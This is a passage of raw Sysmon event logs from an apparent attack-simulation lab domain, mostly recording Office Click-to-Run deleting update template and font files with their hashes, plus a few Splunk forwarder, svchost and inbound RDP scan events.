Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\2 Right.accdtMD5=4256F5A0F6B559E8BA2EDEDA8418B537,SHA256=EB3DB4EFED459D01391ABAF4DF3357142BCCD3C24BA46EE9A9CB29EE1070D105,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\1 Top.accdtMD5=9CC058D67C961DE8AE911BC08FA20083,SHA256=B67BF95C0B96143ED59EFF625C1D4E1F200F453BFE4E19C2422B0B298E7DCE67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\Part\1 Right.accdtMD5=17006254D1CDB6E355C88816F4CDD193,SHA256=BF6436E911653ED43E14B888CD92DF6A5EF0532ACC02B586DA6D43C519BF71BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049796Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:39.835{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B52A2E5559FD12144265250308A5A61,SHA256=5C883BDD02442C8565ADD9FDCE516342DE6B88C2A54D6A8FDBE46CC39BA3D557,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049795Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:36.990{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com64448-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049794Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:39.068{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A14991DF80AF5624035128A8A7600D4,SHA256=8FBE6F20A0634D90D37778113737E9B06403B7CFC259E736B459959CEBF77BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DBGHELP.DLLMD5=3AD4BA5FD42E006E38D60AC93FD882E1,SHA256=502593C125B3DCF31D4565FCA6CF49E75233E1D6F3A7DEF2E2E2431E2501D349,IMPHASH=BB529474C9F4922E66F0E0B9D3349BC3truetrue 23542300x800000000000000070776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DBGCORE.DLLMD5=9E429DD6F0C40FFA9451CB04979ED694,SHA256=50F28ED8D5290837EF8CF3839D795E97B7D6DA9F0DBD37999FB0AD719B3FBF32,IMPHASH=9D75F08EA29885182B136CE4FF854114truetrue 10341000x800000000000000070775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.970{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.970{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000070773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.970{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000070772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\DESIGNER\MSADDNDR.OLBMD5=51B83E7CABB1B998560EEA497D354522,SHA256=1285D567F5388CD0758400C5FC946D6492F3DD3DB973436BE321579FBC9C500F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\WINGDNG3.TTFMD5=9E2EE65661BEE40438D514FE592BFCF8,SHA256=AC9EE085920A3D8B076D5E0C61DC9DF42C4BAC28D1FC968344F9CEDDB3972F69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\WINGDNG2.TTFMD5=D6478DBC2E84B8DEF5DC115DCDA0B29D,SHA256=FA671B6FDDEDD57F158AB90B6AA6A7C33DB6F41AB620DB72B7AD1E57C38BDA5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\VLADIMIR.TTFMD5=01A1CDEBB8BF5B8573622FA6F689369C,SHA256=EDE635464683BA465C949D7DD6894F9DFF49A76229618CB0B73E0C85B93E4169,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\VIVALDII.TTFMD5=B90F6A78E5F287B5F110E5013A4772F5,SHA256=13CC1CC1ED4B8192F1840291863551AFA3D950F01110A8FC3127DCA744740A1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\VINERITC.TTFMD5=6B836DCAD1979649AAA53BC8187C9A0D,SHA256=2BBB4CAFA0C5767155971E7BC578483478351A36E55D035450E50B468422A962,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\TEMPSITC.TTFMD5=6E528EAF77E28EBCC849F9769839A5FB,SHA256=1B20B818BE881CF16E711DAF7E3C44BE66A93B581BCD7B580A4423F18595FB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\TCM_____.TTFMD5=9B62DC86F936227B3F7B367BD0B6C05E,SHA256=10DF71CEF84AE0D7031D7FFA072B185343365BE0E59BEC4AC231E7C77811584B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\TCMI____.TTFMD5=D3AB0A606FD2FFBE8F8FA869F382986E,SHA256=3FFA539609563836DC5546F473F6E7A3B7E4C9F7BA5876522925A980AB87FD7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\TCCM____.TTFMD5=409241C7809719CDA95DF4A2B82F751E,SHA256=73655BC3A86553EA1D76DF8C8EED0E8D0DAEBC797ABA885CDE99833FFE9545DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\TCCEB.TTFMD5=45D8B517871A6913C74CDD20A7C9B726,SHA256=9E8A6AF516706030B8536B2EA6535664CD9BEA916FB15304556D8139A6945FF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\TCCB____.TTFMD5=2C7B12085F974A5F257F80276B4C647A,SHA256=B068CD471C07907A772B6F39A415D33D6328D32D1EA0032BE9A717CB4B80B254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\TCB_____.TTFMD5=5D246FE92931A92E7355FE67B5AD609F,SHA256=64DF8CE11B656BDDA3E35275B83DEC7C40FC8A0A73D8A921918FB99B538F62D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\TCBI____.TTFMD5=286113F7F49CC7F348402A12C2419ED9,SHA256=4FEE7243FFB931F65713DE0537A145F6AA1E7302C8398FEA68C4864D41E7FD98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\STENCIL.TTFMD5=9FCD24C35310AEEFF2C51D619A18315E,SHA256=5D53B38FA8FF33D15676CDCD78B261681BFDA861C449B4F7DDFD7574A5C11E18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\SNAP____.TTFMD5=96ECDC49467AA24E191B8EFE15A6701E,SHA256=B9E8A921CC54334132052F880FC1B8B236CB6F41B1CFA4618EA399014E6CEA4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\SHOWG.TTFMD5=D66FA62DABED66F2226A1B2D17DA0579,SHA256=80CD2486979C2C18F9DD59277C0FD800959AFA1CE23820DCF7BCE31F208647AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\SEGOEUISL.TTFMD5=073C54DEAB691DBA98BE14FE4FEA8278,SHA256=B1FDA74A72733DDE77A9B1837F1A96DAE29079366A069CC0785DCDAA5AACC3C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\SCRIPTBL.TTFMD5=E825587941CBB3FD56B4CD2B1172387A,SHA256=EBD9CA7DC28FEE37C942B4084F377711BA571DA5FD7154125ABF8F81C9628CE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\SCHLBKI.TTFMD5=16D4D38FCF14A66800F123AE987CA1AE,SHA256=73FF30499A0C673440E6DF6E134E0731E586112AB99A0553F7C4DBB28F84366A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\SCHLBKBI.TTFMD5=6A549D47526475D0E7EB0A09E15DEC61,SHA256=8DECCA6DF27BE6BB2BD15801DD9CDE62502BF4FB20EFD835038861455FFE763B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\SCHLBKB.TTFMD5=FE14BB3C81A590120618F17B80F4BCC8,SHA256=A13C13A72C0AAFC2BE6BAF52FD28B1745AF6F0FD5FBD365499C7298F4EE416A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ROCKI.TTFMD5=E1A957BD6BD4DAB347B7F5BF97751543,SHA256=70AF64A5BC061505E7A1CB1CD691811768A7CC84E53D48FCB526DEB53F8C7A57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ROCKEB.TTFMD5=D12864F9BB6E6FBFC3086390A99E3646,SHA256=6C52077681D5D1831B9E8F6621DEB82DE960418D24FE39D8CDC88778FBB19E30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ROCKBI.TTFMD5=0FCAF7A1825173B1BCBA0124D287C52B,SHA256=C8A0F6976209CC198BC47EE287FD872FD86690F4D2893057E7EE92DD1235FB5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ROCKB.TTFMD5=800BF3DD15BA06C3B2F5733D35C8E62E,SHA256=FC9FD442D2DCD719C88D42121D69F5DD9DDA02CC1C8AFA025D261EC28795468F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ROCK.TTFMD5=FCCA3A4A6DF1AB46DD94C73F2E912FDE,SHA256=0C61E5CE8296A55761CDB9D350D4C990BE4CDA8890CC70F2ABDEDFC357F96D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ROCC____.TTFMD5=29D3F9298F21EB0EF3F4B236EDEEA6BF,SHA256=967465E783B62CE5FDFB10183753DDFA0BA6396036340FD3CC67F85187D57689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ROCCB___.TTFMD5=C77F2225063FD0A5185855499A1ED67E,SHA256=BDA7C484B491BB10914D668300C6560621DE1B091784010F2D4D239020B6E5BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\REFSPCL.TTFMD5=DA7D0632677782C7C4DD8B201CE85A8F,SHA256=0F9CD250887E38B99FF7111769D249DAEE8634C2C875F49C3599017BD2586AAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\REFSAN.TTFMD5=C8F34A4D8D6A866F095261F987A237A8,SHA256=26D345F357D8213475EFF6459CCF2DBC9D707E2F8C0445540F3BB183F717C0F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\RAVIE.TTFMD5=2AECA327AE0E8BA04BF305F13CB1D589,SHA256=7019D811B304287BE2223F1667E0989F862951CBBA660BDE13A86BB103D97B80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 